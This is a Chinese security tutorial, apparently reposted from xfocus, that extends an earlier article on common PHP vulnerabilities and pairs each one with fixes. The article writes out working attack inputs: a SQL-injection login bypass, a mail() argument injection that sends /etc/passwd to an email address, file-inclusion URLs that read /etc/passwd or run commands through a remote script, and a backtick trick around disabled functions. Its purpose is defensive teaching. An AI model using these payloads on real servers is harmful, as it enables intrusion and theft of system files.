歡迎來到Linux教程網
Linux教程網
Linux教程網
Linux教程網
您现在的位置: Linux教程網 >> UnixLinux >  >> Linux綜合 >> Linux資訊 >> 更多Linux

對PHP程序中的常見漏洞進行攻擊之狗尾續貂

對PHP程序中的常見漏洞進行攻擊之狗尾續貂 原創:san(小許) 來源:http://www.xfocus.org A Study In Scarlet - EXPloiting Common Vulnerabilities in PHP Applications 之狗尾續貂 by [email protected] Shaun Clowes的文章Exploiting Common Vulnerabilities in PHP Applications的確寫的很棒, 考慮到了很多方面,我這個文章只是狗尾續貂,補充一些其它沒怎麼提到的問題。本文側重於解決問題,而不是 攻擊。 1、古老的欺騙SQL語句 在默認模式下,即使是你忘了把php.ini拷到/usr/local/lib/php.ini下,php還是打開magic_quotes_gpc=on。 這樣所有從GET/POST/Cookie來的變量的單引號(')、雙引號(")、反斜槓backslash(\)以及空字元NUL (the null byte)都會被加上反斜槓,以使數據庫能夠正確查詢。 但是在php-4-RC2的時候引入了一個配置文件php.ini-optimized,這個優化的php.ini卻是 magic_quotes_gpc=off的。某些網管看到optimized字樣也許就會把php.ini-optimized拷到 /usr/local/lib/php.ini,這時就比較危險。象比較簡單的驗證,假設沒有過濾必要的字符: select * from login where user='$HTTP_POST_VARS[user]' and pass='$HTTP_POST_VARS[pass]' 我們就可以在用戶框和密碼框輸入1‘ or 1='1通過驗證了。這是非常古董的方法了,這個語句會 替換成這樣: select * from login where user='1' or 1='1' and pass='1' or 1='1' 因為or 1='1'成立,所以通過了。 解決的辦法最好就是過濾所有不必要的字符,還有就是推薦對於從GET/POST/Cookie來的並且用在SQL 中的變量加一個自定義的函數: function gpc2sql($str) { if(get_magic_quotes_gpc()==1) return $str; else return addslashes($str); } 主要是為了你的程序能安全移植在各種系統裡。 2、mail函數的第五個參數 在php-4.0.5的時候,mail函數引入了第五個參數,用來設置在實際發送郵件的時候增加額外的命令行參數, 但是沒有很好的檢查特殊SHELL命令字符,所以出現執行命令的大問題。就像手冊裡的例子: mail("[email protected]", "the subject", $message, "From: webmaster@$SERVER_NAME", "-fwebmaster@$SERVERNAME"); 這個是存在問題的,如果$SERVER_NAME=;mail [email protected] < /etc/passwd就能把機器的密碼發送 到我的信箱了。 這裡提醒一下,php手冊裡還有好幾個例子存在安全問題的,大家實際使用的時候不要照搬,它只是演示函數的 基本功能,理解了就可以了。 對於mail函數的這個問題,最簡單的我們就不用這個第五個參數,要使用就過濾非法的字符如(;),還有就是修改 php源碼包的程序ext/standard/mail.c,在if (extra_cmd != NULL) { 前增加如下一行: extra_cmd=NULL 然後重新編譯。 3、UNIX版的require, include函數 win版本的require和include函數是不支持HTTP和FTP遠程文件包含的,而UNIX版本默認都是支持遠程包含文件。 require和include不管你是什麼擴展名的,把你包含進來就作為程序的一部分來執行。 我們在寫程序的時候為了程序的模塊化,以及程序的可移植性,不可避免的用到很多require或include函數,


而且有時用變量作為參數,比如:include("$something"); 如果這時用戶能控制$something參數,而這個 參數又沒有過濾,那就慘拉。 首先可以看任何web用戶有讀權限的文件,假設這個程序叫http://victim/test.php,這樣我們就可以用如下 url: http://victim/test.php?something=/etc/passwd 看到/etc/passwd文件。 另外可以利用其遠程文件包含的功能執行命令。比如我在www.xfocus.org下建立一個文件test.php,內容是: ,那麼我就可以用如下的url: http://victim/test.php?something=http://www.xfocus.org/test.php?cmd=uname這種方式運行任 意的命令。 phpMyAdmin也出現了這個問題,我們可以用它看任何我們想看的文件。但是它在include前,先用file_exist 函數判斷文件是否存在,而這個file_exist是不支持遠程文件的,所以上面第二種辦法無法直接使用。但是我們 可以利用apache的日志功能,請求一個帶php代碼的url,這樣,something指定為apache的日志也可以執行命 令了,但是apache的日志通常比較大,有太多雜亂信息。 http://www.securereality.com.au/sradv00008.txt提到的辦法比較巧妙,用file upload的方式把本地 的執行命令的腳本上傳,會在服務器的文件上傳臨時目錄裡產生php8Ta02I之類的文件名,由於這時文件是存在的 ,所以能通過file_exist函數,從而執行上傳文件裡的執行腳本。 所以對於include, require函數的使用一定要小心,特別是以包含的文件以參數指定這種方式,參數絕對不能 讓用戶來控制。還有通過修改php.ini文件去掉遠程文件包含這個功能。這個在php-4.0.3以前用 disable-url-fopen-wrapper 在以後的版本用allow_url_fopen = off來關閉。 4、disable_function 在php-4.0.1,php.ini裡引入了一項功能disable_functions , 這個功能比較有用,可以用它禁止一些函數。 比如在php.ini裡加上disable_functions = passthru exec system popen 那麼在執行這些函數的時候 只會提示Warning: system() has been disabled for security reasons. 唉,但是也不是沒有辦法執行系統命令了。因為php采用了很多perl的特性,比如還可以用(`)來執行命令: $output = `ls -al`; echo " $output "; ?> 這個只有設成safe_mode才能避免,可是可惡的safe_mode實在是限制太多了,做其它事情也有些礙手礙腳。 5、file upload php文件上傳的問題在文章http://www.securereality.com.au/sradv00001.Html裡已經描述的很清楚了, 這的確是個比較嚴重的問題,一般我們要上傳的文件也會放在web目錄,所以容易給攻擊者得到系統的一些web用戶 能讀的文件。 幸虧在php-4.0.3以後提供了is_uploaded_file和move_uploaded_file函數。所以php-4.0.3以上的上傳文 件的程序一定不要再用copy函數了,用move_uploaded_file代替,它會檢查是否是上傳的文件。如果是php-4.0.2 及以下的,建議在copy前加一個函數: function is_uploaded_file($filename) { if (!$tmp_file = get_cfg_var('upload_tmp_dir')) { $tmp_file = dirname(tempnam('', '')); } $tmp_file.='/'.basename($filename); /* User might have trailing slash in php.ini... */ return (ereg_replace('/+', '/', $tmp_file) == $filename); } 這個漏洞在安全焦點呆了很久,只是在copy之前有很多驗證阿、判斷阿的語句,所以使之攻擊存在相當的難度,赫赫。 還有,千萬不要以環境變量、Cookie變量、session變量等作為關系生死的判斷條件,因為這些變量太容易被偽造了。 呵呵,手頭事情比較多,其它慢慢想到了再加吧,也歡迎其他同志任意的添加修改之。 參考文獻 1、PHP 4 ChangeLog (http://www.php.net/ChangeLog-4.php) 2、A Study In Scarlet - Exploiting Common Vulnerabilities in PHP Applications (http://www.securereality.com.au/studyinscarlet.txt)及analysist的翻譯。 3、Remote command execution vulnerabilities in phpMyAdmin and phpPgAdmin

(http://www.securereality.com.au/sradv00008.txt)



Copyright © Linux教程網 All Rights Reserved